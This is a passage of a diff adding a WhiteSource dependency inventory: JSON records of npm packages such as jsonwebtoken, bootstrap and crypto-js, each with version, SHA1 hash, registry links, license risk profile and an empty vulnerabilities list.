"c2f1d9e9-4ec1-48f2-8cda-944d62442a52", + "keyId": 26966907, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/asn1.js/-/asn1.js-4.10.1.tgz", + "homePage": "https://github.com/indutny/asn1.js", + "genericPackageIndex": "https://www.npmjs.org/package/asn1.js" + }, + "matchType": "SHA1", + "sha1": "b9c2bf5805f1e64aadeed6df3a2bfafb5a73f5a0", + "name": "asn1.js-4.10.1.tgz", + "artifactId": "asn1.js-4.10.1.tgz", + "version": "4.10.1", + "groupId": "asn1.js", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/7b740d01-663c-451d-9a15-40ac4f31f449" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "287a191a-8212-405a-b241-d20f5673a0ae", + "keyId": 26984209, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ci-info/-/ci-info-1.6.0.tgz", + "homePage": "https://github.com/watson/ci-info", + "genericPackageIndex": "https://www.npmjs.org/package/ci-info" + }, + "matchType": "SHA1", + "sha1": "2ca20dbb9ceb32d4524a683303313f0304b1e497", + "name": "ci-info-1.6.0.tgz", + "artifactId": "ci-info-1.6.0.tgz", + "version": "1.6.0", + "groupId": "ci-info", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/ci-info" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "2c54359c-6a59-4ba9-b750-485f822d28a7", + "keyId": 26976144, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/toidentifier/-/toidentifier-1.0.0.tgz", + "homePage": "https://github.com/component/toidentifier#readme", + "genericPackageIndex": "https://www.npmjs.org/package/toidentifier" + }, + "matchType": "SHA1", + "sha1": "7e1be3470f1e77948bc43d94a3c8f4d7752ba553", + "name": "toidentifier-1.0.0.tgz", + "artifactId": "toidentifier-1.0.0.tgz", + "version": "1.0.0", + "groupId": "toidentifier", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/toidentifier/v/1.0.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "723a440f-2b7e-48b9-8ab2-5370e2d2235c", + "keyId": 26948559, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/get-stdin/-/get-stdin-4.0.1.tgz", + "homePage": "https://github.com/sindresorhus/get-stdin", + "genericPackageIndex": "https://www.npmjs.org/package/get-stdin" + }, + "matchType": "SHA1", + "sha1": "b968c6b0a04384324902e8bf1a5df32579a450fe", + "name": "get-stdin-4.0.1.tgz", + "artifactId": "get-stdin-4.0.1.tgz", + "version": "4.0.1", + "groupId": "get-stdin", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/get-stdin/v/4.0.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "71855d64-9a97-497c-86ae-72d036866833", + "keyId": 27408035, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/raw-body/-/raw-body-2.4.0.tgz", + "homePage": "https://github.com/stream-utils/raw-body#readme", + "genericPackageIndex": "https://www.npmjs.org/package/raw-body" + }, + "matchType": "SHA1", + "sha1": "a1ce6fb9c9bc356ca52e89256ab59059e13d0332", + "name": "raw-body-2.4.0.tgz", + "artifactId": "raw-body-2.4.0.tgz", + "version": "2.4.0", + "groupId": "raw-body", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/ac5b0864-2e5e-4377-9463-49575b47c689" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e544e2af-668c-4dcc-9920-522d6e297443", + "keyId": 26955592, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/got/-/got-6.7.1.tgz", + "homePage": "https://github.com/sindresorhus/got#readme", + "genericPackageIndex": "https://www.npmjs.org/package/got" + }, + "matchType": "SHA1", + "sha1": "240cd05785a9a18e561dc1b44b41c763ef1e8db0", + "name": "got-6.7.1.tgz", + "artifactId": "got-6.7.1.tgz", + "version": "6.7.1", + "groupId": "got", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/got" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8df2e8df-289a-4afd-b432-538af5d568fd", + "keyId": 27026353, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/pify/-/pify-4.0.1.tgz", + "homePage": "https://github.com/sindresorhus/pify#readme", + "genericPackageIndex": "https://www.npmjs.org/package/pify" + }, + "matchType": "SHA1", + "sha1": "4b2cd25c50d598735c50292224fd8c6df41e3231", + "name": "pify-4.0.1.tgz", + "artifactId": "pify-4.0.1.tgz", + "version": "4.0.1", + "groupId": "pify", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/18abea1b-3fc5-4606-9543-0ae3bd5bec3a" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "595129d0-10ed-4e83-8ecd-01e4f5750141", + "keyId": 27215036, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ipaddr.js/-/ipaddr.js-1.9.0.tgz", + "homePage": "https://github.com/whitequark/ipaddr.js#readme", + "genericPackageIndex": "https://www.npmjs.org/package/ipaddr.js" + }, + "matchType": "SHA1", + "sha1": "37df74e430a0e47550fe54a2defe30d8acd95f65", + "name": "ipaddr.js-1.9.0.tgz", + "artifactId": "ipaddr.js-1.9.0.tgz", + "version": "1.9.0", + "groupId": "ipaddr.js", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/ipaddr.js/v/1.9.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c7adbff5-4906-4be1-bf2a-2836cd349564", + "keyId": 27007474, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/crypto-js/-/crypto-js-3.1.9-1.tgz", + "homePage": "http://github.com/brix/crypto-js", + "genericPackageIndex": "https://www.npmjs.org/package/crypto-js" + }, + "matchType": "SHA1", + "sha1": "fda19e761fc077e01ffbfdc6e9fdfc59e8806cd8", + "name": "crypto-js-3.1.9-1.tgz", + "artifactId": "crypto-js-3.1.9-1.tgz", + "version": "3.1.9-1", + "groupId": "crypto-js", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/crypto-js" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "933c7157-8a09-4f08-8d33-8b2c29aded2c", + "keyId": 26955506, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/string-width/-/string-width-1.0.2.tgz", + "homePage": "https://github.com/sindresorhus/string-width#readme", + "genericPackageIndex": "https://www.npmjs.org/package/string-width" + }, + "matchType": "SHA1", + "sha1": "118bdf5b8cdc51a2a7e70d211e07e2b0b9b107d3", + "name": "string-width-1.0.2.tgz", + "artifactId": "string-width-1.0.2.tgz", + "version": "1.0.2", + "groupId": "string-width", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/b47a70e5-4d90-47f1-870e-6d7338b5ed29" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "574e3752-f584-46a7-bcbc-569cd44698a0", + "keyId": 26955720, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lodash.once/-/lodash.once-4.1.1.tgz", + "homePage": "https://lodash.com/", + "genericPackageIndex": "https://www.npmjs.org/package/lodash.once" + }, + "matchType": "SHA1", + "sha1": "0dd3971213c7c56df880977d504c88fb471a97ac", + "name": "lodash.once-4.1.1.tgz", + "artifactId": "lodash.once-4.1.1.tgz", + "version": "4.1.1", + "groupId": "lodash.once", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/lodash.once/v/4.1.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "afee8500-d802-4b45-b37c-5dae4ef67472", + "keyId": 26948549, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.0.tgz", + "homePage": "https://github.com/juliangruber/balanced-match", + "genericPackageIndex": "https://www.npmjs.org/package/balanced-match" + }, + "matchType": "SHA1", + "sha1": "89b4d199ab2bee49de164ea02b89ce462d71b767", + "name": "balanced-match-1.0.0.tgz", + "artifactId": "balanced-match-1.0.0.tgz", + "version": "1.0.0", + "groupId": "balanced-match", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/c9a61460-6481-429b-a626-f6da73697f6b" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "196575c2-e982-4d34-bd20-08948ce1af4e", + "keyId": 26964104, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/buffer-equal-constant-time/-/buffer-equal-constant-time-1.0.1.tgz", + "genericPackageIndex": "https://www.npmjs.org/package/buffer-equal-constant-time" + }, + "matchType": "SHA1", + "sha1": "f8e71132f7ffe6e01a5c9697a4c6f3e48d5cc819", + "name": "buffer-equal-constant-time-1.0.1.tgz", + "artifactId": "buffer-equal-constant-time-1.0.1.tgz", + "version": "1.0.1", + "groupId": "buffer-equal-constant-time", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/buffer-equal-constant-time/v/1.0.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "de3e10b5-8263-4305-9d45-ef2324abf734", + "keyId": 26948735, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.6.tgz", + "homePage": "https://github.com/nodejs/readable-stream#readme", + "genericPackageIndex": "https://www.npmjs.org/package/readable-stream" + }, + "matchType": "SHA1", + "sha1": "b11c27d88b8ff1fbe070643cf94b0c79ae1b0aaf", + "name": "readable-stream-2.3.6.tgz", + "artifactId": "readable-stream-2.3.6.tgz", + "version": "2.3.6", + "groupId": "readable-stream", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/0d0ba43f-fb1b-42c7-8a8d-bfb90412a5c0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ef75958f-988f-4a84-9259-5c243aef5a7f", + "keyId": 26955595, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/unpipe/-/unpipe-1.0.0.tgz", + "homePage": "https://github.com/stream-utils/unpipe", + "genericPackageIndex": "https://www.npmjs.org/package/unpipe" + }, + "matchType": "SHA1", + "sha1": "b2bf4ee8514aae6165b4817829d21b2ef49904ec", + "name": "unpipe-1.0.0.tgz", + "artifactId": "unpipe-1.0.0.tgz", + "version": "1.0.0", + "groupId": "unpipe", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/unpipe" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "88bb50b3-2d71-490a-94c9-1ae7b4643811", + "keyId": 26955010, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/semver-diff/-/semver-diff-2.1.0.tgz", + "homePage": "https://github.com/sindresorhus/semver-diff", + "genericPackageIndex": "https://www.npmjs.org/package/semver-diff" + }, + "matchType": "SHA1", + "sha1": "4bbb8437c8d37e4b0cf1a68fd726ec6d645d6d36", + "name": "semver-diff-2.1.0.tgz", + "artifactId": "semver-diff-2.1.0.tgz", + "version": "2.1.0", + "groupId": "semver-diff", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/semver-diff" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4121b730-71c5-445c-913d-beea51953be1", + "keyId": 26955459, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/figures/-/figures-2.0.0.tgz", + "homePage": "https://github.com/sindresorhus/figures#readme", + "genericPackageIndex": "https://www.npmjs.org/package/figures" + }, + "matchType": "SHA1", + "sha1": "3ab1a2d2a62c8bfb431a0c94cb797a2fce27c962", + "name": "figures-2.0.0.tgz", + "artifactId": "figures-2.0.0.tgz", + "version": "2.0.0", + "groupId": "figures", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/ddc57c9b-dc1c-4851-8c95-1c1be9622bcf" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ead52914-21d1-4bf2-94c1-ea4c4c8025c1", + "keyId": 27100458, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-selector-parser/-/postcss-selector-parser-5.0.0.tgz", + "homePage": "https://github.com/postcss/postcss-selector-parser", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-selector-parser" + }, + "matchType": "SHA1", + "sha1": "249044356697b33b64f1a8f7c80922dddee7195c", + "name": "postcss-selector-parser-5.0.0.tgz", + "artifactId": "postcss-selector-parser-5.0.0.tgz", + "version": "5.0.0", + "groupId": "postcss-selector-parser", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/postcss-selector-parser" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3b8f7617-67ad-4a83-80d9-d76396b85f84", + "keyId": 26955651, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/get-stream/-/get-stream-3.0.0.tgz", + "homePage": "https://github.com/sindresorhus/get-stream#readme", + "genericPackageIndex": "https://www.npmjs.org/package/get-stream" + }, + "matchType": "SHA1", + "sha1": "8e943d1358dc37555054ecbe2edb05aa174ede14", + "name": "get-stream-3.0.0.tgz", + "artifactId": "get-stream-3.0.0.tgz", + "version": "3.0.0", + "groupId": "get-stream", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/2b95b7b0-e780-41c1-b01b-f278b47389b1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "294441be-b782-405f-ab36-c134a3c7d8d3", + "keyId": 27303906, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/jsonwebtoken/-/jsonwebtoken-8.5.1.tgz", + "homePage": "https://github.com/auth0/node-jsonwebtoken#readme", + "genericPackageIndex": "https://www.npmjs.org/package/jsonwebtoken" + }, + "matchType": "SHA1", + "sha1": "00e71e0b8df54c2121a1f26137df2280673bcc0d", + "name": "jsonwebtoken-8.5.1.tgz", + "artifactId": "jsonwebtoken-8.5.1.tgz", + "version": "8.5.1", + "groupId": "jsonwebtoken", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/a25b271d-ca99-42ca-a8a0-46ace364af46" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f2f32128-8b46-4ff6-b70e-293898fb1f97", + "keyId": 27193828, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/bootstrap/-/bootstrap-4.3.1.tgz", + "homePage": "https://getbootstrap.com/", + "genericPackageIndex": "https://www.npmjs.org/package/bootstrap" + }, + "matchType": "SHA1", + "sha1": "280ca8f610504d99d7b6b4bfc4b68cec601704ac", + "name": "bootstrap-4.3.1.tgz", + "artifactId": "bootstrap-4.3.1.tgz", + "version": "4.3.1", + "groupId": "bootstrap", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/bootstrap" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "bb5e6eef-10fa-4688-b8bf-40448027b52d", + "keyId": 26955583, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-4.0.0.tgz", + "homePage": "https://github.com/chalk/strip-ansi#readme", + "genericPackageIndex": "https://www.npmjs.org/package/strip-ansi" + }, + "matchType": "SHA1", + "sha1": "a8479022eb1ac368a871389b635262c505ee368f", + "name": "strip-ansi-4.0.0.tgz", + "artifactId": "strip-ansi-4.0.0.tgz", + "version": "4.0.0", + "groupId": "strip-ansi", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/c534e1f1-f9f3-4893-a450-b118a80f23a1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "1e8f865b-1157-4bc8-bbb9-8e0befc96e0d", + "keyId": 26954894, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/depd/-/depd-1.1.2.tgz", + "homePage": "https://github.com/dougwilson/nodejs-depd#readme", + "genericPackageIndex": "https://www.npmjs.org/package/depd" + }, + "matchType": "SHA1", + "sha1": "9bcd52e14c097763e749b274c4346ed2e560b5a9", + "name": "depd-1.1.2.tgz", + "artifactId": "depd-1.1.2.tgz", + "version": "1.1.2", + "groupId": "depd", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/depd" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "753ec458-ae6d-47f4-be0b-79d2ed417c26", + "keyId": 26955325, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/resolve-url/-/resolve-url-0.2.1.tgz", + "homePage": "https://github.com/lydell/resolve-url", + "genericPackageIndex": "https://www.npmjs.org/package/resolve-url" + }, + "matchType": "SHA1", + "sha1": "2c637fe77c893afd2a663fe21aa9080068e2052a", + "name": "resolve-url-0.2.1.tgz", + "artifactId": "resolve-url-0.2.1.tgz", + "version": "0.2.1", + "groupId": "resolve-url", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/5f7b9797-e778-46a4-b81c-a09fda94a92d" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7de0d75e-d1fa-42ca-9e11-174f5d52e3c0", + "keyId": 26966912, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/import-cwd/-/import-cwd-2.1.0.tgz", + "homePage": "https://github.com/sindresorhus/import-cwd#readme", + "genericPackageIndex": "https://www.npmjs.org/package/import-cwd" + }, + "matchType": "SHA1", + "sha1": "aa6cf36e722761285cb371ec6519f53e2435b0a9", + "name": "import-cwd-2.1.0.tgz", + "artifactId": "import-cwd-2.1.0.tgz", + "version": "2.1.0", + "groupId": "import-cwd", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/import-cwd" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c2c4f3d7-f926-49ae-af62-59441778ee86", + "keyId": 27296032, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/bytes/-/bytes-3.1.0.tgz", + "homePage": "https://github.com/visionmedia/bytes.js#readme", + "genericPackageIndex": "https://www.npmjs.org/package/bytes" + }, + "matchType": "SHA1", + "sha1": "f6cf7933a360e0588fa9fde85651cdc7f805d1f6", + "name": "bytes-3.1.0.tgz", + "artifactId": "bytes-3.1.0.tgz", + "version": "3.1.0", + "groupId": "bytes", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/bytes/v/3.1.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9fa37242-dd6a-4d41-b59e-64fd4a9cc870", + "keyId": 26955661, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/global-dirs/-/global-dirs-0.1.1.tgz", + "homePage": "https://github.com/sindresorhus/global-dirs#readme", + "genericPackageIndex": "https://www.npmjs.org/package/global-dirs" + }, + "matchType": "SHA1", + "sha1": "b319c0dd4607f353f3be9cca4c72fc148c49f445", + "name": "global-dirs-0.1.1.tgz", + "artifactId": "global-dirs-0.1.1.tgz", + "version": "0.1.1", + "groupId": "global-dirs", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/7845a107-b3fb-4a41-87be-82c721290037" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "16050d40-9324-48c3-a556-df8d78063438", + "keyId": 27023536, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-loader/-/postcss-loader-3.0.0.tgz", + "homePage": "https://github.com/postcss/postcss-loader#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-loader" + }, + "matchType": "SHA1", + "sha1": "6b97943e47c72d845fa9e03f273773d4e8dd6c2d", + "name": "postcss-loader-3.0.0.tgz", + "artifactId": "postcss-loader-3.0.0.tgz", + "version": "3.0.0", + "groupId": "postcss-loader", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/postcss-loader" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "864784b0-cf31-4409-b3ca-a9f56c3a4199", + "keyId": 27389515, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/component-emitter/-/component-emitter-1.3.0.tgz", + "homePage": "https://github.com/component/emitter#readme", + "genericPackageIndex": "https://www.npmjs.org/package/component-emitter" + }, + "matchType": "SHA1", + "sha1": "16e4070fba8ae29b679f2215853ee181ab2eabc0", + "name": "component-emitter-1.3.0.tgz", + "artifactId": "component-emitter-1.3.0.tgz", + "version": "1.3.0", + "groupId": "component-emitter", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/component-emitter" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "566557c6-ec5d-4b59-ac7a-86e65abe30d2", + "keyId": 26954799, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": 